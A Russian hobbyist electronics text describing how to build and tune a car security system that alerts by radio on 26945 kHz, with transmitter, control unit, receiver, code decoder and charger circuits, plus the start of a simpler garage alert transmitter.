Для предварительной настройки радиопередатчика потребуется изготовить эквивалентную антенне нагрузку (рис. 2.58), состоящую из четырех включенных параллельно резисторов на конце 50-омного кабеля длиной 1,64 м. Резисторы подойдут типа МЛТ или С2-23 мощностью 1 Вт. Выводы у них скручиваются между собой и припаиваются к кабелю при минимальной длине.

Настройка начинается с задающего кварцевого автогенератора. Для этого между выводами 1 и 2 схемы временно устанавливается резистор номиналом 150 Ом, а также перемычка между выводами 1 — 4. Питание подается на выводы 1 (+12 В) и 3 (общий провод) при подключенном эквиваленте антенны. Далее, вращая подстроенные сердечники L1, L2 и L4, добиваемся на выходе (на эквивалентной нагрузке) максимальной амплитуды сигнала.

Для обеспечения надежной работы передатчика задающий автогенератор настраивается на точку максимальной устойчивости колебаний. Выполняется это следующим образом: вкручиваем сердечник в катушку L1 до получения максимального уровня сигнала генератора, после чего поворачиваем подстроечник на пол-оборота назад, пока не будет заметно уменьшение сигнала. Настройку автогенератора можно также выполнять по максимальному току потребления. Такая методика подробно описана в литературе [Л 12, стр. 125]. При этом необходимо помнить, что работа передатчика в режиме непрерывного сигнала (без модуляции несущей) допускается кратковременно (не более 1 мин), так как транзистор VT4 не имеет теплоотвода — при усилении импульсно-модулированного сигнала он и не нужен.

Измерив амплитуду высокочастотного напряжения на нагрузке, например с помощью высокочастотного осциллографа (С1-99) или вольтметра, можно определить выходную мощность передатчика по формуле:

2-59.jpg

где:

U — действующее значение напряжения сигнала, [В];

Um — амплитуда сигнала на нагрузке, [В];

R — сопротивление нагрузки, [Ом].

Низкочастотный вольтметр, подключенный к гнездам XS1, XS2, будет измерять Um (стрелочный прибор обеспечивает достаточную точность для определения мощности).

Для удобства настройки приведена таблица с уже посчитанными по этой формуле значениями мощности в зависимости от измеренного напряжения (для нагрузки сопротивлением 45 Ом), а промежуточные значения можно посчитать по формуле.

Таблица 2.3

Um, [В]

8

9

10

11

12

12,5

13

13,5

14

14,5

U, [В]

5,66

6,36

7,07

7,77

8,48

8,84

9,19

9,54

9,9

10,25

Р, [Вт]

0,77

0,90

1,11

1,34

1,60

1,73

1,88

2,02

2,18

2,34


 

Если измеренная мощность будет меньше чем 1,8 Вт (из-за низкого коэффициента усиления транзистора VT4), то вместо резистора обратной связи по постоянному току R9 можно установить перемычку. В схеме элементы, отмеченные "*", могут потребовать подбора.

Рабочая частота передатчика не должна отклоняться от номинальной 26945 кГц более чем на 1,34 кГц (измеряем частотомером ЧЗ-63 на эквиваленте нагрузки в режиме кратковременной работы передатчика без модуляции). Окончательная настройка выполняется при подключенной цифровой схеме блока управления.

 

Pис. 2.55. Конструкция катушки

Изображение: 

Рис. 2.51. Электрическая схема высокочастотной части передатчика

Изображение: 

Рис. 2.52. Форма выходного сигнала передатчика

Изображение: 

Рис. 2.53. Топология печатной платы и расположение элементов высокочастотной части передатчика

Изображение: 

Рис. 2.54. Конструкция катушки

Изображение: 

Рис. 2.56. Конструкция дросселя L3

Изображение: 

Рис. 2.57. Антенна с согласующим устройством

Изображение: 

Рис. 2.58. Эквивалентная антенна, нагрузка для настройки передатчика

Изображение: 

Ф.1 Определение выходной мощности передатчика

Изображение: 

2.10.2. Блок управления

Блок управления

Управление включением передатчика, а также формирование временных интервалов и модулирующего сигнала осуществляет схема, приведенная на рис. 2.59. Она собрана на КМОП микросхемах, что позволяет получить малое потребление тока в ждущем режиме. При этом все основные временные интервалы получены без использования электролитических конденсаторов, что обеспечивает высокую надежность работы и стабильность параметров в широком температурном диапазоне.

2-60.jpg

Рис. 2.59. Схема управления

Питание на схему блока охраны подается группой контактов поляризованного реле (К1.1). Реле К1 является герметичным и имеет две обмотки. Оно не требует постоянного питания для фиксации контактов в нужном положении. Кнопка SB1 выполняет включение охраны, а скрытно установленная кнопка SB2 выключает блок.

Для того чтобы исключить быстрое выключение охраны вором, вместо одной кнопки SB2 можно использовать несколько последовательно соединенных или же установить миниатюрное гнездо многоконтактного разъема, в ответной части которого припаивается нужная перемычка. Временная установка в гнездо такого "ключа" отключит охрану.

В начальный момент подачи питания короткий импульс, сформированный цепью C2-R4 и C4-R5, устанавливает триггеры микросхемы D2 в исходное состояние (лог. "О" на выходе D2/1, лог. "1" на D2/12). Датчик на двери водителя F1 подключен на вход элемента D1.1, а конденсатор С1 предотвращает срабатывание элемента D1.1, а значит, и триггера D2.1 от дребезга контактов датчика при его переключении.

Схема переходит в ждущий режим охраны, когда после выхода из машины будет закрыта дверь водителя. В этом случае по фронту положительного перепада напряжения на входе D2.1/3 триггер переключится и появится сигнал лог. "1" на входе D2.2/9, что разрешает срабатывание D2.2 от очередного замыкания любых охранных датчиков.

2-61.jpg

Рис. 2.60. Форма модулирующих импульсов

При включении режима ОХРАНА лог. "1" на входе D1.4/9 разрешает работу автогенератора на элементах микросхемы D1.3 и D1.4 (все временные соотношения в устройстве зависят от частоты этого генератора). При этом будут работать счетчики D3 и D4. Индикатором перехода схемы в режим ОХРАНА является мигание светодиода HL1. Через интервал времени, задаваемый двоичным кодом на входах счетчика D4, на выходе D4/23 кратковременно (около 1 с) появится лог. "1" (через 4 мин). Проходя через элементы D7.2 и D7.3, высокий уровень включает коммутатор D5.2, который подает питание на задающий автогенератор передатчика.

На элементах микросхем D8, D9 и D11 собран формирователь пачки из 7 модулирующих импульсов, рис. 2.60. Работа такого формирователя подробно описана в первом разделе, (рис. 1.46.). А если вместо микросхемы D8 установить К561ИЕ8, число импульсов в пачке может быть увеличено до 8 или 9.

При срабатывании датчика F1 ВЧ сигнал будет прерывистым, а звуковая сирена включится через 6 с на интервал времени 18 с. Режим работы сирены 18 с и пауза 6 с будут повторяться в течение времени, пока на выходе счетчика D10/12 не появится лог. "1". Этот уровень через диод VD7 подается на обнуление триггера D2.2, что вернет счетчики D6 и D10 в исходное состояние. Время работы сигнализации в режиме ТРЕВОГА после однократного срабатывания любого датчика зависит от положения переключателя SA2.

В случае постоянного замыкания любого другого датчика F2...Fn звуковой сигнал будет включен без задержки и непрерывно. Высокочастотная модуляция передатчика будет также непрерывной (пачками импульсов). По длительности интервала, в течение которого работает звуковой сигнализатор, хозяин сможет определить, какая группа датчиков сработала, и отличить сигнал именно своей охраны.

Включение звукового сигнализатора выполняет высокий уровень сигнала с выходов счетчика D6.2. Через диоды VD8, VD9 он поступает на управление коммутатором D5.3. Транзистор VT1 подает питание на звуковой сигнализатор (ток нагрузки транзистора может быть до 5 А). Показанное на схеме включение транзистора позволяет закрепить его непосредственно на корпусе передатчика, обеспечивая теплоотвод, что избавляет от необходимости использовать дополнительный радиатор.

2-62.jpg

Рис. 2.61. Доработка схемы

При желании в сигнализацию можно ввести функцию кратковременной звуковой индикации установки режима ОХРАНА. Дополнительно установленный транзистор VT2, показанный на схеме (рис. 2.61 а), позволяет включить звуковой сигнализатор на 1 с (пока идет заряд конденсатора С7 от появившегося напряжения лог. "1" на выходе D2.1/1) при переходе схемы в режим ОХРАНА.

Для подключения к сигнализации датчика с нормально замкнутыми контактами в схему нужно внести изменения, показанные на рис. 2.616, а для подключения датчика колебаний можно воспользоваться рекомендациями, приведенными в статье [Л13].

При правильном монтаже устройство будет работать сразу, а настройка схемы заключается в установке резистором R7 частоты автогенератора 600 Гц на элементах D1.3, D1.4 и проверки формируемых временных интервалов:

а) появление сигнала проверки радиоканала — кратковременное включение передатчика через 4 мин после первоначального включения и установки ре жима ОХРАНА (интервал при необходимости можно увеличить во время первоначальной настройки с помощью цифрового двоичного кода на входах счетчика D4);

б) включение звукового сигнализатора через 6 с после открывания двери водителя и чередование интервалов: работа сигнализатора 18с — пауза 6 с;

в) включение звукового сигнала и работа передатчика при срабатывании любого другого датчика F2...Fn.

Светодиод с красным цветом свечения (включаемый коммутатором D5.4) позволяет обеспечить контроль за состоянием датчиков F2...Fn, а также формирование сигнала на включение сирены без ее подключения.

Топология печатной платы для схемы управления не разрабатывалась, а монтаж выполняется на универсальной макетной плате. Корпус передатчика может быть изготовлен из любого токопроводящего материала и состоит из двух отсеков, в одном из которых расположена плата управления. При этом конструкция корпуса должна предусматривать защиту от проникновения влаги внутрь.

Для удобства настройки и проверки режимов работы блока охраны на корпусе передатчика установлен переключатель SA1 (из серии ПГ2-5). Он позволяет, не вскрывая корпуcа, проверить все основные параметры передатчика. Так при замкнутых контактах датчика F2 и положении SA1: 1 — на выходе XW1 будут пачки из 7 импульсов; положение 2 — непрерывная генерация для измерения частоты и мощности передатчика; 3 — модуляция меандром, что обеспечивает удобство настройки каскадов передатчика, а так же измерение частоты низкочастотного задающего генератора на D1.3, D1.4 (сигнал снимается с эквивалента нагрузки после детектора, рис. 2.58.).

Сдвоенный светодиод HL1 можно заменить двумя обычными с разным цветом свечения. А в качестве диодов VD1...VD3 и VD6...VD10 могут использоваться любые импульсные. Транзистор КТ825 может иметь любую последнюю букву в обозначении. Микросхемы серии К561 заменяются аналогичными из серий КР1561 или 564.

Основным источником питания всего устройства является аккумулятор автомобиля, но предусмотрено подключение и резервного источника напряжением 12,6 В (G1). В ждущем режиме ОХРАНА блок потребляет не более 2,5 мА

(в основном за счет работы светодиода). При включении высокочастотного блока передатчика потребляемый ток не должен превышать 150 мА (если модуляция осуществляется пачками импульсов).

2-63.jpg

Рис. 2.62. Индикатор ВЧ поля

Окончательная настройка передатчика выполняется после установки на автомобиль. Для этого потребуется изготовить индикатор поля (рис. 2.62) или любой аналогичный из опубликованных в литературе [Л12], с помощью которого можно настроить антенну передатчика сердечником катушки L6 на максимальное излучение. Положение 1 переключателя SA1 в индикаторе поля позволяет предотвратить повреждение механизма измерительного прибора при транспортировке (катушка L1 имеет 11 витков провода МТ диаметром 2,51 мм на каркасе диаметром 25 мм с отводом от третьего витка, а дроссель L2 типа ДМ — 0,2-60 мкГн).

 

Рис. 2.59. Схема управления

Изображение: 

Рис. 2.60. Форма модулирующих импульсов

Изображение: 

Рис. 2.61. Доработка схемы

Изображение: 

Рис. 2.62. Индикатор ВЧ поля

Изображение: 

2.10.3. Радиоприемник

Радиоприемник

Приемник предназначен для приема амплитудно-модулированных сигналов на фиксированной частоте 26945 кГц. Для удобства его использования прием производится на встроенную рамочную антенну.

Известно, что дальность работы данной системы в основном зависит от чувствительности приемника. Чтобы увеличить дальность в 2 раза, необходимо во столько же раз увеличить чувствительность приемника или в 4 раза увеличить мощность передатчика (увеличивать мощность передатчика более 2 Вт нельзя из-за предъявляемых требований к таким устройствам).

Приемник, используемый в системе охраны, должен обеспечивать также длительную непрерывную работу от автономного источника питания. Так как отечественная промышленность не выпускает подходящих высокочастотных микросхем, которые способны работать от низковольтного питания в режиме малых токов, при этом обеспечивая высокую чувствительность, электрическую схему высокочастотной части приемника пришлось выполнять на дискретных элементах (рис. 2.63), что делает ее доступной для повторения....

2-64.jpg

Рис. 2.63. Высокочастотная часть приемника

Основные технические параметры приемника:

  1. чувствительность на внутреннюю антенну не хуже 0.5...1 мкВ;
  2. частота промежуточного усиления 465 кГц;
  3. избирательность по соседнему каналу не хуже 40 дБ;
  4. напряжение питания 3...4,5 В;
  5. потребляемый ток (вместе с цифровой схемой дешифратора):
    • в режиме "охрана" не более 2,2 мА;
    • в режиме "оповещения" не более 5 мА;
  6. диапазон рабочих температур +10...+50°С.

Высокочастотная часть приемника работает в режиме микротоков и построена по супергетеродинной схеме. Входной контур, состоящий из индуктивноети рамочной антенны WA1 и конденсаторов С1, СЗ, С5, а также контур L2-C12 ограничивают полосу принимаемых частот, что увеличивает помехоустойчивость приема и избирательность по зеркальному каналу. На транзисторе VT1 собран усилитель высокой частоты (УВЧ) приемника. Гетеродин на транзисторе VT2 стабилизирован по частоте кварцевым резонатором ZQ1 (26480 кГц). Это позволяет не проводить подстройку приемника на частоту передатчика в процессе эксплуатации.

2-65.jpg

Рис. 2.64. Конструкция катушек L1 и L2 приемника

Промежуточная частота 465 кГц выделяется смесителем, выполненным на транзисторе VT3. Усилитель ПЧ собран на транзисторах VT4, VT6...VT8. Пьезофильтр ZQ2 (ФП1П1-61,02) обеспечивает хорошее подавление сигналов соседних каналов. Усиленный сигнал ПЧ выделяется на контуре L5-C28, с которого через индуктивную связь подается на активный детектор из транзистора VT13.

2-66.jpg

Рис. 2.65. Конструкция рамочной антенны приемника WA1

Использование активного детектора позволяет ему работать при значительно меньшем уровне входного сигнала, чем это обеспечивают диодные схемы. После усиления транзисторами VT14 и VT9 выделенные низкочастотные импульсы поступают на дешифратор.

Транзистор VT5 используется в системе автоматической регулировки усиления. На диодном включении транзисторов VT10...VT12 собран низковольтный стабилизатор рабочих режимов усилительных каскадов, что необходимо для работы приемника в широком диапазоне питающих напряжений. По сравнению с обычными диодами транзисторные переходы дают лучшую стабилизацию при работе на малом токе.

2-67.jpg

Pис. 2.66. а) Топология печатной платы приемника

2-68.jpg

Рис. 2.66. 6) Расположение элементов

В схеме применены резисторы С2-23, подстроенный конденсатор С1 типа К4-236, остальные конденсаторы типа К10-17 или КМ6 (те из них, что применяются в контурах, лучше установить с минимальным ТКЕ). Электролитические конденсаторы С6, С8, С16, СЗЗ и С35 типа К50-16 на 6,3 В.

Катушки L1 и L2 выполнены на каркасе диаметром 5 мм проводом ПЭВ-2 диаметром 0,23 мм, рис. 2.64, и содержат: L1 — 12 витков, L2 — 12 витков с отводом от середины. Конструкция катушек контуров промежуточной частоты показана на рис. 2.17. Они выполняются проводом ПЭЛ диаметром 0,1 мм и содержат: L3 и L4 по 80 витков, L5 — обмотка 1-2 — 80 витков (ее индуктивность примерно 120 мкГн), 3-4 — 120 витков (намотка начинается с обмотки 3-4).

2-69.jpg

Рис. 2.67. Форма напряжения в контрольных точках

Антенна WA1 — выполнена печатными проводниками на монтажной плате из двухстороннего стеклотекстолита толщиной 1,0 мм и размерами 125х65 мм и содержит три витка, рис. 2.65. Печатные проводники второго слоя показаны пунктиром. Печатная плата, используемая для монтажа элементов приемника и закрепления трех аккумуляторов, приведена на рис. 2.66. Она содержит две перемычки, устанавливаемые до начала монтажа. Большинство резисторов располагаются вертикально, что уменьшает размеры конструкции. Аккумуляторы размещаются в картонных каркасах по их диаметру и прижимаются сверху печатной платой с размерами 95х30 мм (на этой же плате располагается дешифратор). Часть элементов основной платы, отмеченные штрихом, относятся к схеме дешифратора.

Настройка приемника начинается с усилителя промежуточной частоты на максимальное усиление. Для этого с генератора Г4-176 на базу VT3 через разделительный конденсатор 1000 пФ подаем сигнал 465 кГц (с точностью 0,5 кГц) с импульсной 100% модуляцией меандром на частоте 1 кГц. Изменяя амплитуду сигнала генератора от 100 мВ до 1 мкВ с помощью сердечников катушек L8, L6 и L5, получаем максимальное напряжение на выходе детектора. Сигнал удобно контролировать осциллографом, а его форма на коллекторе транзисторов VT13 и VT14 показана на рис. 2.67. Номинал резистора R33 может потребовать подбора, так чтобы при отсутствии входного сигнала на коллекторе VT14 было нулевое напряжение.

Окончательную регулировку УПЧ проводим при амплитуде выходного сигнала (Uq) не более 200 мВ. Если УПЧ после настройки не обеспечивает достаточного усиления, то вместо резисторов R16 и R12 можно установить перемычки и повторить настройку.

Настройка гетеродина на рабочую частоту выполняется по следующему методу:

а) от генератора Г4-176 подать сигнал уровнем 1 мВ на частоте 26945 кГц с импульсной 100% модуляцией меандром (1 кГц) на виток связи, закрепленный на пластине (рис. 2.68) (WA1 содержит два витка и выполняется проводом МГШВ диаметром 0,2 мм на прямоугольном каркасе с размерами 80х150 мм);

2-70.jpg

Рис. 2.68. Виток связи для настройки приемника при подаваемом с
генератора сигнале

б) вращая подстроенный сердечник поочередно в катушках L2, L3 и L4, необходимо получить максимальную амплитуду импульсов на выходе детектора, а окончательную подстройку проводим при сигнале Uq не более 120 мВ (в этом случае работа каскада автоматической регулировки усиления не будет снижать уровень сигнала, мешая настройке приемника на максимальную чувствительность);

в) настройка антенны WA1 на рабочую частоту проводится конденсатором С1 при уровне сигнала, подаваемом с генератора, менее 2 мкВ (можно установить перемычки вместо R3 и R23, если это не приведет к самовозбуждению каскадов).

После этого можно проверить действие автоматической регулировки усиления. Увеличивая ВЧ сигнал с генератора на 80 дБ, осциллографом контролируем ширину импульсов tu на коллекторе VT14 — длительность импульсов не должна увеличиваться более чем на 30% относительно начальной. Необходимо также проверить работу схемы при изменении питающего напряжения от 3 до 4,5 В. На этом настройка высокочастотной части приемника считается законченной, и можно подключать дешифратор кода.

 

Pис. 2.66. а) Топология печатной платы приемника

Изображение: 

Рис. 2.63. Высокочастотная часть приемника

Изображение: 

Рис. 2.64. Конструкция катушек L1 и L2 приемника

Изображение: 

Рис. 2.65. Конструкция рамочной антенны приемника WA1

Изображение: 

Рис. 2.66. 6) Расположение элементов

Изображение: 

Рис. 2.67. Форма напряжения в контрольных точках

Изображение: 

Рис. 2.68. Виток связи для настройки приемника при подаваемом с генератора сигнале

Изображение: 

2.10.4. Дешифратор

Дешифратор

Цифровая часть дешифратора позволяет выделить на фоне помех и других сигналов "свой". Схема простого дешифратора индивидуального кода приведена на рис. 2.69.

Так как от данной системы не требуется иметь дешифратор на много возможных вариантов кода, схему удалось выполнить всего на трех микросхемах. При этом используется свойство КМОП микросхем работать при низковольтном питании.

Пачки входных импульсов поступают на формирователь, собранный из элементов R1, С1 и D1.1. Такая схема предотвращает срабатывание повторителя сигнала D1.1 от кратковременных помех, а также обеспечивает крутые фронты импульсов на выходе, независимо от их крутизны на входе.

С выхода D1.1/3 импульсы поступают на счетчик импульсов D2 и детектор паузы, собранный на элементах R2, С2, VD1, D1.2. Пока на выходе D1.1 действует уровень лог. "0", конденсатор С2 через диод VD1 быстро разряжается и на выходе D1.2/4 будет действовать лог. "0". В паузе между пачками импульсов С2 постепенно зарядится через резистор R2 и на выходе D1.2 сформируются импульсы, положительный фронт которых выполняет запись состояния с выхода счетчика D2/10 в триггер D3.1. Этот же импульс, поступая на вход R, переводит счетчик D2 в исходное состояние (обнуляет). Данный процесс периодически повторяется при появлении очередной пачки импульсов на входе. Диаграмма напряжений, показанная на рис. 2.70, поясняет работу схемы.

Если число импульсов в пачке равно 7, на выходе D2/10 появляются импульсы, высокий уровень которых записывается в регистр триггера D3.1. На триггерах D3.1 и D3.2 собраны формирователи интервалов длительностью 1,5 и 35 с соответственно. Цепь из элементов R6-C5 исключает случайную запись в триггер D3.2 лог. "1" в момент включения питания приемника.

Светодиод HL1 индицирует наличие принятого кода, и по его состоянию можно легко определить, какая группа датчиков на охраняемом автомобиле сработала.

2-71.jpg

Рис. 2.69. Электрическая схема дешифратора

Так, при кратковременном срабатывании любого из датчиков HL1 будет мигать с интервалом около 2 с. Если же он постоянно светится, то, значит, постоянно замкнут один из датчиков F2...Fn. В случае, если включился звук оповещения, а светодиод не светится, — скорее всего дешифратор сработал от помехи (исключение составляет однократное срабатывание звукового сигнала приемника при включении режима проверки радиоканала).

2-72.jpg

Рис. 2.70. Эпюры напряжения в контрольных точках

Триггер D3.2 при появлении на его выводе 13 лог. "1" разрешает работу низкочастотного автогенератора на элементах D1.3, D1.4 в течение времени не менее 35 с. Этот интервал не зависит от того, какой из датчиков замкнулся. Звуковой сигнал в приемнике будет звучать, пока работает передатчик, а также некоторое время после его отключения (до 35 с). Выключение звукового сигнала выполняется кнопкой SB1, если светодиод не светится, или же выключателем SA1, в случае продолжения работы передатчика.

В качестве звукового сигнализатора использован пьезоизлучатель типа ЗП-25 (ЗП-22, ЗП-18). А для того чтобы повысить громкость его работы при низковольтном питании, параллельно с пьезокерамическим излучателем включена катушка 11. Она содержит 400 витков провода ПЭЛ диаметром 0,08 мм (0,1 или 0,12 мм), намотанных на склеенных клеем БФ-2 ("Момент") двух кольцах типоразмера К10х6х3 мм из феррита 700НМ1 (или 1000НН). Подбором номинала резистора R10 можно настроить частоту низкочастотного генератора так, чтобы громкость звукового сигнала была максимальной.

Предварительную проверку работы дешифратора удобно выполнять, подавая инверсный сигнал с модулятора передатчика на вход элемента D1.1.

В схеме применены резисторы МЛТ, конденсаторы типа К10-17, а С4 — К50-16.

Корпус приемника имеет такую же конструкцию, как и в опубликованном выше электрошоковом устройстве (две платы, одна из которых одновременно является антенной, образуют каркас, на который одевается кожух). Некоторые
стойки крепления между платами являются одновременно соединительными цепями.

После окончательной сборки и настройки приемника нужно измерить потребляемый схемой ток. Он не должен превышать значений, указанных в технических параметрах. Причиной повышенного потребления тока может быть ошибочное подключение полярности электролитических конденсаторов или ошибки монтажа.

Для уменьшения размеров дешифратора в схеме можно применять аналогичные микросхемы с планарным расположением выводов из серии 564.

Если на данной частоте имеется большой уровень помех, то большую помехоустойчивость может обеспечить дешифратор кода, схема которого описана в литературе [Л11, стр. 140]. Она содержит в два раза больше микросхем, но позволяет последовательно запоминать три принятых кодовых посылки, и, если не менее двух из них правильные — схема принимает решение о достоверном приеме своего сигнала.

 

Рис. 2.69. Электрическая схема дешифратора

Изображение: 

Рис. 2.70. Эпюры напряжения в контрольных точках

Изображение: 

2.10.5. Источник питания с автоматическим

Источник питания с автоматическим зарядным устройством

Для того чтобы не разряжать аккумулятор приемника при использовании системы охраны, находясь дома, он подключается к стационарному сетевому источнику. Схема, рис. 2.71, контролирует состояние аккумуляторов и при необходимости автоматически выполняет их подзаряд. Кроме этого, в случае появления сигнала тревоги транзистор VT1 выполняет усиление громкости звукового сигнала оповещения, что обеспечивает удобство эксплуатации.

2-73.jpg

Рис. 2.71. Схема источника питания с зарядным устройством

2-74.jpg

Рис. 2.72. Топология печатной платы п расположение элементов для схемы
источника питания

Индикатором включения источника питания в сеть является свечение зеленого светодиода (HL1), а при работе режима подзарядки аккумуляторов светится красный (HL2).

Устройство работает следующим образом. Микросхема D1 выполняетстабилизацию выходного напряжения, уровень которого может ступенькой меняться (6,6 или 5В — это зависит от того, светится светодиод HL2 или нет). Светодиод HL2 кроме световой индикации процесса заряда является еще и источником опорного напряжения 1,6 В для микросхемы.

На транзисторах VT2 и VT3 собран анализатор уровня выходного напряжения источника питания. Из-за большого коэффициента усиления этих транзисторов они переключаются из запертого состояния в открытое при изменении напряжения на выходе на 0,1 В. Схема при подключенных аккумуляторах на страивается резистором R8 так, чтобы порог открывания транзисторов составлял примерно 3,9...4 В (при этом светодиод HL2 не должен светиться).

Величина тока через аккумуляторы зависит от их состояния, и по мере заряда он постепенно снижается. Максимальный ток заряда ограничен величиной примерно 20 мА (задается номиналом резистора R5). По мере роста емкости заряда напряжение на аккумуляторах постепенно растет, и, когда оно достигнет величины 3,9 В, выходное напряжение стабилизатора D1 уменьшится с 6,6 В до 5 В. При этом подзаряд прекратится.

В схеме применены постоянные резисторы МЛТ, подстроечный R8 типа СП5-2; электролитические конденсаторы К50-35 на 25 В. Диоды можно заменить любыми на ток не менее 500 мА и обратное напряжение 50 В. Светодиоды использованы разных цветов из серии КИП32 или аналогичные с малым потребляемым током при свечении. Трансформатор подойдет из унифицированных, например типа ТН 1-220-50 или любой другой с напряжением во вторичной обмотке 9...12 В.

Вариант топологии печатной платы и расположение элементов для схемы источника питания приведен на рис. 2.72.

Конструктивно корпус источника питания выполняется в виде подставки под приемник, но так, чтобы при этом вертикально установленный приемник подключался через гнездо соответствующего разъема (Х1) к цепям источника питания. Разъем Х1 применен типа МРН4.

 

Рис. 2.71. Схема источника питания с зарядным устройством

Изображение: 

Рис. 2.71. Схема источника питания с зарядным устройством

Изображение: 

6. зарядным устройством

Источник питания с автоматическим зарядным устройством

Для того чтобы не разряжать аккумулятор приемника при использовании системы охраны, находясь дома, он подключается к стационарному сетевому источнику. Схема, рис. 2.71, контролирует состояние аккумуляторов и при необходимости автоматически выполняет их подзаряд. Кроме этого, в случае появления сигнала тревоги транзистор VT1 выполняет усиление громкости звукового сигнала оповещения, что обеспечивает удобство эксплуатации.

2-73.jpg

Рис. 2.71. Схема источника питания с зарядным устройством

2-74.jpg

Рис. 2.72. Топология печатной платы п расположение элементов для схемы
источника питания

Индикатором включения источника питания в сеть является свечение зеленого светодиода (HL1), а при работе режима подзарядки аккумуляторов светится красный (HL2).

Устройство работает следующим образом. Микросхема D1 выполняетстабилизацию выходного напряжения, уровень которого может ступенькой меняться (6,6 или 5В — это зависит от того, светится светодиод HL2 или нет). Светодиод HL2 кроме световой индикации процесса заряда является еще и источником опорного напряжения 1,6 В для микросхемы.

На транзисторах VT2 и VT3 собран анализатор уровня выходного напряжения источника питания. Из-за большого коэффициента усиления этих транзисторов они переключаются из запертого состояния в открытое при изменении напряжения на выходе на 0,1 В. Схема при подключенных аккумуляторах на страивается резистором R8 так, чтобы порог открывания транзисторов составлял примерно 3,9...4 В (при этом светодиод HL2 не должен светиться).

Величина тока через аккумуляторы зависит от их состояния, и по мере заряда он постепенно снижается. Максимальный ток заряда ограничен величиной примерно 20 мА (задается номиналом резистора R5). По мере роста емкости заряда напряжение на аккумуляторах постепенно растет, и, когда оно достигнет величины 3,9 В, выходное напряжение стабилизатора D1 уменьшится с 6,6 В до 5 В. При этом подзаряд прекратится.

В схеме применены постоянные резисторы МЛТ, подстроечный R8 типа СП5-2; электролитические конденсаторы К50-35 на 25 В. Диоды можно заменить любыми на ток не менее 500 мА и обратное напряжение 50 В. Светодиоды использованы разных цветов из серии КИП32 или аналогичные с малым потребляемым током при свечении. Трансформатор подойдет из унифицированных, например типа ТН 1-220-50 или любой другой с напряжением во вторичной обмотке 9...12 В.

Вариант топологии печатной платы и расположение элементов для схемы источника питания приведен на рис. 2.72.

Конструктивно корпус источника питания выполняется в виде подставки под приемник, но так, чтобы при этом вертикально установленный приемник подключался через гнездо соответствующего разъема (Х1) к цепям источника питания. Разъем Х1 применен типа МРН4.

 

Рис. 2.71. Схема источника питания с зарядным устройством

Рис. 2.71. Схема источника питания с зарядным устройством

Рис. 2.50. Блок-схема системы

Изображение: 

12. Простая система радиооповещения

Простая система радиооповещения

Иногда для дистанционного оповещения при охране гаража или машины достаточно простейшей системы. В этом случае может пригодиться предлагае мое устройство, состоящее из радиопередатчика, работающего на фиксированной частоте 26945 кГц и узкополосного приемника.

Электрическая схема передатчика приведена на рис. 2.73. Высокочастотная часть состоит из двух каскадов на транзисторах VT1, VT2 и имеет минимальное число настроечных элементов.

2-75.jpg

Pиc. 2.73. Радиопередатчик

Это упрощает его изготовление и обеспечивает работу схемы без подстройки передатчика в диапазоне частот 26...30 МГц
при смене задающего рабочую частоту кварца.

Катушки дросселей L1 и L2 наматываются проводом ПЭЛ диаметром 0,12 мм на корпусе резистора МЛТ-0,5 с номинальным сопротивлением 1...1.8 кОм и содержат 50 витков (конструкция показана на рис. 2.56). Катушки L3, L4 и L5 выполняются на диэлектрическом каркасе диаметром 5 мм с резьбой для вкручивания латунного сердечника с резьбой М4. Они содержат соот-
ветственно 14, 14 и 15 витков провода ПЭЛ диаметром 0.4...0,5 мм. Катушка L4 располагается горизонтально на монтажной плате. В качестве сердечника можно использовать латунные винты (для этого потребуется спилить головку и выполнить прорезь — шлиц для отвертки). Перед вкручиванием сердечников их смазываем любым несохнущим вязким герметиком.

В схеме применены резисторы МЛТ. неполярные конденсаторы К10-17 (с минимальным ТКЕ), подстроечный С10 типа К4-236, электролитический С4 — К52-1 на 22 В.

Модулирующая часть передатчика выполнена на одной цифровой микросхеме КМОП серии. На элементах D1.2 и D1.3 собран генератор низкочастотных импульсов с частотой (около 1000 Гц), которые коммутируют с помощью электронного ключа на элементе микросхемы D1.4 питание на высокочастотный автогенератор. Модулирующую частоту можно с помощью изменения элементов С2, R2 и R3 устанавливать любую в диапазоне от 300 до 2000 Гц.

Когда цепь датчика F1 замкнута — генератор не работает и вся схема в ждущем режиме потребляет микроток (не более 0,05 мА). При размыкании F1 — включается передатчик. Работающий передатчик с импульсной 100% модуляцией потребляет ток не более 100 мА.

Напряжение питания схемы передатчика может находиться в диапазоне 9...13 В. При этом выходная мощность передатчика в импульсе составляет не более 0,8 Вт.

Настройка схемы заключается в получении с помощью подстроенных сердечников катушек максимальной амплитуды выходного ВЧ сигнала. Для этого сначала подключаем эквивалентную антенне активную нагрузку, рис. 2.74, и сердечником катушек L3, L4 и конденсатором С10 добиваемся резонанса в контурах П-фильтра.

Окончательная подстройка выполняется при подключенной антенне по индикатору электромагнитного поля с помощью ферритового сердечника катушки L5 и конденсатора С11. Простейшая схема широкополосного индикатора поля показана на рис. 2.75. Один из возможных вариантов выполнения индикатора поля приведен на рис. 2.62.

Антенной передатчика может служить металлический штырь (800...1200 мм) или же любой натянутый провод длиной примерно 1...2.5 м. При установке устройства на стационарном объекте антенна из провода меньше привлекает внимание и иногда позволяет сделать ее по размерам соизмеримой с длиной волны (до 10 м), что повышает эффективность излучения сигнала.

При переносном варианте конструкции передатчика в качестве антенны удобно использовать телескопическую, от любого бытового радиоприемника или телевизора. А для питания устройства подойдут 8 аккумуляторов типа НКГЦ-0,5.

2-76.jpg

Рис. 2.74. Подключение эквивалентной антенне нагрузки для настройки передатчика

2-77.jpg

Рис. 2.75. Широкополосный индикатор поля

Все элементы схемы радиопередатчика расположены на печатной плате размером 105х35 мм из одностороннего стеклотекстолита толщиной 1...2 мм, рис. 2.76.

Высокочастотная часть приемника выполнена на аналоговой интегральной микросхеме DA1 (К174ХА2) по супергетеродинной схеме, рис. 2.77. Внутренний гетеродин стабилизирован по частоте кварцем ZQ1 (26480 кГц), что обеспечивает надежность приема при изменении температуры и питающего напряжения. Частота гетеродина выбрана ниже частоты принимаемого сигнала на 465 кГц. Выделяемая внутренним смесителем промежуточная частота усиливается и поступает на детектор VD2. Диод VD1 улучшает работу встроенной системы автоматической регулировки усиления при приеме импульсно-модулированных
сигналов. Что обеспечивает работоспособность приемника и на близком расстоянии от передатчика.

